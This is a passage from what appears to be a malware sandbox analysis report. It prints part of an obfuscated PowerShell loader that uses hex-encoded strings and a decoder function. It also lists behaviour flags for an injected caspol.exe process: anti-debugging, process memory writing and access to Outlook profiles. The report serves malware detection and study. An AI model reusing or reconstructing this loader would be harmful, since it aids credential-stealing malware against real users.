'B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A08C939ACBC78A878A8C978A908ECFC3D0D6DACFC3C7B78A9386CFC3C7AF8684868E8F8A84849186CA';&($Dochter7) $rick1;$rick2 = HTB 'C7B096818A8E81918A8082978687C3DEC3B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A48697A7868F8684829786A58C91A5968D80978A8C8DB38C8A8D978691CBC7A09691908C918F828290868DD0CFC3CBA4A7B7C3A3CBB8AA8D97B39791BECFB8AA8D97B39791BECAC3CBB8B58C8A87BECACACA';&($Dochter7) $rick2;$rick3 = HTB 'C7B096818A8E81918A8082978687CDAA8D958C8886CBC7B78A9386CFC7AD868A848B818C96918F8A8690CA';&($Dochter7) $rick3#"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:336
-
-
-